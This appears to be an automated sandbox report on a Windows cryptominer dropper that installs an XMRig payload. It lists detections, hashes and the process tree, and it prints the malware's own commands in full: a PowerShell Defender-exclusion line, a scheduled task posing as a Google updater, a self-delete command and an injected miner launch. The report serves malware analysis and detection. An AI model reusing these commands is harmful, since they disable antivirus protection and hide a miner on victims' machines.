Overview
overview
10Static
static
3grhsghsGHs...y8.exe
windows7-x64
10grhsghsGHs...y8.exe
windows10-2004-x64
10grhsghsGHs...SE.exe
windows7-x64
10grhsghsGHs...SE.exe
windows10-2004-x64
10grhsghsGHs...CD.exe
windows7-x64
10grhsghsGHs...CD.exe
windows10-2004-x64
10grhsghsGHs...Da.exe
windows7-x64
10grhsghsGHs...Da.exe
windows10-2004-x64
10grhsghsGHs...wq.exe
windows7-x64
10grhsghsGHs...wq.exe
windows10-2004-x64
10grhsghsGHs...r7.exe
windows7-x64
10grhsghsGHs...r7.exe
windows10-2004-x64
10grhsghsGHs...XJ.exe
windows7-x64
10grhsghsGHs...XJ.exe
windows10-2004-x64
10grhsghsGHs...eg.exe
windows7-x64
10grhsghsGHs...eg.exe
windows10-2004-x64
10grhsghsGHs...5H.exe
windows7-x64
10grhsghsGHs...5H.exe
windows10-2004-x64
10grhsghsGHs...XN.exe
windows7-x64
10grhsghsGHs...XN.exe
windows10-2004-x64
10grhsghsGHs...T3.exe
windows7-x64
10grhsghsGHs...T3.exe
windows10-2004-x64
10grhsghsGHs...9r.exe
windows7-x64
10grhsghsGHs...9r.exe
windows10-2004-x64
10grhsghsGHs...GR.exe
windows7-x64
10grhsghsGHs...GR.exe
windows10-2004-x64
10grhsghsGHs...EX.exe
windows7-x64
10grhsghsGHs...EX.exe
windows10-2004-x64
10grhsghsGHs...EA.exe
windows7-x64
10grhsghsGHs...EA.exe
windows10-2004-x64
10grhsghsGHs...FB.exe
windows7-x64
10grhsghsGHs...FB.exe
windows10-2004-x64
10Resubmissions
25-01-2024 16:55
240125-vfcyksbhgr 1024-01-2024 17:15
240124-vstf4aecaj 1023-01-2024 19:27
240123-x6cfvagbd9 1023-01-2024 19:27
240123-x6bvbafgem 1023-01-2024 19:27
240123-x6bjjsgbd8 1023-01-2024 19:27
240123-x6ax1sfgek 1023-01-2024 19:27
240123-x6abgsfgej 1023-01-2024 19:27
240123-x591qagbd7 1023-01-2024 19:27
240123-x59d7agbd6 1023-01-2024 19:27
240123-x584esgbd5 10Analysis
-
max time kernel
427s -
max time network
1784s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
24-01-2024 17:15
Static task
static1
Behavioral task
behavioral1
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral11
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral13
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win7-20231129-en
Behavioral task
behavioral14
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral15
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win7-20231215-en
Behavioral task
behavioral16
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral17
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral19
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win7-20231215-en
Behavioral task
behavioral20
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral21
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral25
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win7-20231129-en
Behavioral task
behavioral28
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral29
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win7-20231129-en
Behavioral task
behavioral30
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral31
Sample
grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe
Resource
win7-20231215-en
General
-
Target
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
description pid Process procid_target PID 2176 created 1360 2176 Y2JYGshMHJGuGREA.exe 8 PID 2176 created 1360 2176 Y2JYGshMHJGuGREA.exe 8 PID 2176 created 1360 2176 Y2JYGshMHJGuGREA.exe 8 PID 2176 created 1360 2176 Y2JYGshMHJGuGREA.exe 8 PID 2408 created 1360 2408 updater.exe 8 PID 2408 created 1360 2408 updater.exe 8 PID 2408 created 1360 2408 updater.exe 8 PID 2408 created 1360 2408 updater.exe 8 PID 900 created 1360 900 conhost.exe 8 PID 2408 created 1360 2408 updater.exe 8 -
XMRig Miner payload 30 IoCs
resource yara_rule behavioral29/memory/2108-71-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-73-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-74-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-78-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-80-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-82-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-84-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-86-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-88-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-90-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-97-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-99-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-101-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-103-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-105-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-107-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-109-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-116-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-118-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-120-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-122-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-124-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-126-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-128-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-130-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-132-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-134-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-136-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-138-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral29/memory/2108-140-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
pid Process 2796 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2408 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 2760 taskeng.exe -
resource yara_rule behavioral29/memory/2108-67-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-71-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-73-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-74-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-78-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-80-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-82-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-84-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-86-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-88-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-90-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-97-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-99-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-101-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-103-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-105-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-107-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-109-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-116-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-118-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-120-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-122-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-124-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-126-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-128-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-130-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-132-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-134-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-136-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-138-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral29/memory/2108-140-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2408 set thread context of 900 2408 updater.exe 53 PID 2408 set thread context of 2108 2408 updater.exe 48 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe Y2JYGshMHJGuGREA.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2500 schtasks.exe 3040 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2888 WMIC.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 700ba39cb94fda01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 2176 Y2JYGshMHJGuGREA.exe 2176 Y2JYGshMHJGuGREA.exe 2996 powershell.exe 2176 Y2JYGshMHJGuGREA.exe 2176 Y2JYGshMHJGuGREA.exe 2592 powershell.exe 2176 Y2JYGshMHJGuGREA.exe 2176 Y2JYGshMHJGuGREA.exe 2176 Y2JYGshMHJGuGREA.exe 2176 Y2JYGshMHJGuGREA.exe 2252 powershell.exe 2408 updater.exe 2408 updater.exe 1956 powershell.exe 2408 updater.exe 2408 updater.exe 1796 powershell.exe 2408 updater.exe 2408 updater.exe 2408 updater.exe 2408 updater.exe 900 conhost.exe 900 conhost.exe 2408 updater.exe 2408 updater.exe -
Suspicious use of AdjustPrivilegeToken 31 IoCs
description pid Process Token: SeDebugPrivilege 2996 powershell.exe Token: SeDebugPrivilege 2592 powershell.exe Token: SeDebugPrivilege 2252 powershell.exe Token: SeDebugPrivilege 1956 powershell.exe Token: SeDebugPrivilege 1796 powershell.exe Token: SeDebugPrivilege 2408 updater.exe Token: SeAssignPrimaryTokenPrivilege 2888 WMIC.exe Token: SeIncreaseQuotaPrivilege 2888 WMIC.exe Token: SeSecurityPrivilege 2888 WMIC.exe Token: SeTakeOwnershipPrivilege 2888 WMIC.exe Token: SeLoadDriverPrivilege 2888 WMIC.exe Token: SeSystemtimePrivilege 2888 WMIC.exe Token: SeBackupPrivilege 2888 WMIC.exe Token: SeRestorePrivilege 2888 WMIC.exe Token: SeShutdownPrivilege 2888 WMIC.exe Token: SeSystemEnvironmentPrivilege 2888 WMIC.exe Token: SeUndockPrivilege 2888 WMIC.exe Token: SeManageVolumePrivilege 2888 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2888 WMIC.exe Token: SeIncreaseQuotaPrivilege 2888 WMIC.exe Token: SeSecurityPrivilege 2888 WMIC.exe Token: SeTakeOwnershipPrivilege 2888 WMIC.exe Token: SeLoadDriverPrivilege 2888 WMIC.exe Token: SeSystemtimePrivilege 2888 WMIC.exe Token: SeBackupPrivilege 2888 WMIC.exe Token: SeRestorePrivilege 2888 WMIC.exe Token: SeShutdownPrivilege 2888 WMIC.exe Token: SeSystemEnvironmentPrivilege 2888 WMIC.exe Token: SeUndockPrivilege 2888 WMIC.exe Token: SeManageVolumePrivilege 2888 WMIC.exe Token: SeLockMemoryPrivilege 2108 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2592 wrote to memory of 3040 2592 powershell.exe 32 PID 2592 wrote to memory of 3040 2592 powershell.exe 32 PID 2592 wrote to memory of 3040 2592 powershell.exe 32 PID 2796 wrote to memory of 2696 2796 cmd.exe 33 PID 2796 wrote to memory of 2696 2796 cmd.exe 33 PID 2796 wrote to memory of 2696 2796 cmd.exe 33 PID 2252 wrote to memory of 2540 2252 powershell.exe 38 PID 2252 wrote to memory of 2540 2252 powershell.exe 38 PID 2252 wrote to memory of 2540 2252 powershell.exe 38 PID 2760 wrote to memory of 2408 2760 taskeng.exe 40 PID 2760 wrote to memory of 2408 2760 taskeng.exe 40 PID 2760 wrote to memory of 2408 2760 taskeng.exe 40 PID 1796 wrote to memory of 2500 1796 powershell.exe 45 PID 1796 wrote to memory of 2500 1796 powershell.exe 45 PID 1796 wrote to memory of 2500 1796 powershell.exe 45 PID 2408 wrote to memory of 900 2408 updater.exe 53 PID 1576 wrote to memory of 2888 1576 cmd.exe 47 PID 1576 wrote to memory of 2888 1576 cmd.exe 47 PID 1576 wrote to memory of 2888 1576 cmd.exe 47 PID 2408 wrote to memory of 2108 2408 updater.exe 48 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1360
-
C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:3040
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\Y2JYGshMHJGuGREA.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:2540
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2500
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2108
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1740
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1576
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:900
-
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 31⤵PID:2696
-
C:\Windows\system32\taskeng.exetaskeng.exe {5188B0C6-89D1-464F-890C-487C4159761C} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2408
-
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2888
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
380KB
MD550b69e4545852059a615d551cf644565
SHA14d731eed3bec9cb7335dddac0c6aa6717a0fe55b
SHA25654dd67cfcb248ab8c72598e5d95b500a79d40c95291e0d0430a51cd1e702b41b
SHA512d6002cd7237a6f8caef3bb5207e654fbb283b677e4e28f38925f19842ce6855fa1198fba6116ba5b1b8d6c2715ea7fc92dea2efad9831fa4199c858d2a9f8b05
-
Filesize
303KB
MD5e011c574003185a32b3936dcdb2b1dc1
SHA14938d7c4c6dd9ddc43838fb8f7418ad1c973a826
SHA2565a42b4466e8508afdd2ec704f9e2676beb34e538d9c3999e2b42b0c5e5a6f25c
SHA5126f0e38ca3675f0b6923715b053ee4c796e3e50c6c43a3345723940b3322f77a87aabe06a4c98e41877024cac907443db92cc1f824fd6ad215e94b9f1d57adc0d
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CN16SW74ZRCUXYSQ92GK.temp
Filesize7KB
MD5099f8030b0056510cd50978aaff6ffbe
SHA1be993681c35bb5b50903010e99d62765837bae57
SHA256621b183a8eacaeb30a8ffb0013afdaf0c1fffe31500fcf7e34d50dc0a80b6975
SHA51287515ac7cad78f24d70f01589b3ac88b11153d5255d942f99080b79fc381c6fb62f4b2b30aeff0801301de35ae3b5c22961f012387be2cea022c3bd0e912b249
-
Filesize
422KB
MD596bc788ca3efac5bb2a0dd2af0975189
SHA12f1a3f452583bd781ae6b9e06fae29a6208ca9b6
SHA2564015cfb7cda84951f80fa33e305f468920f867c0bf9af24fa8f7d4c5697db8ec
SHA512d8c6535b3eb03c1a590dc49a5ac023422830a100ef35e1a15a71d9b35d1fa4ab661ff0877379d3eab5c15d8a42b6690fe2af914f551b8de4933dd1814790b38f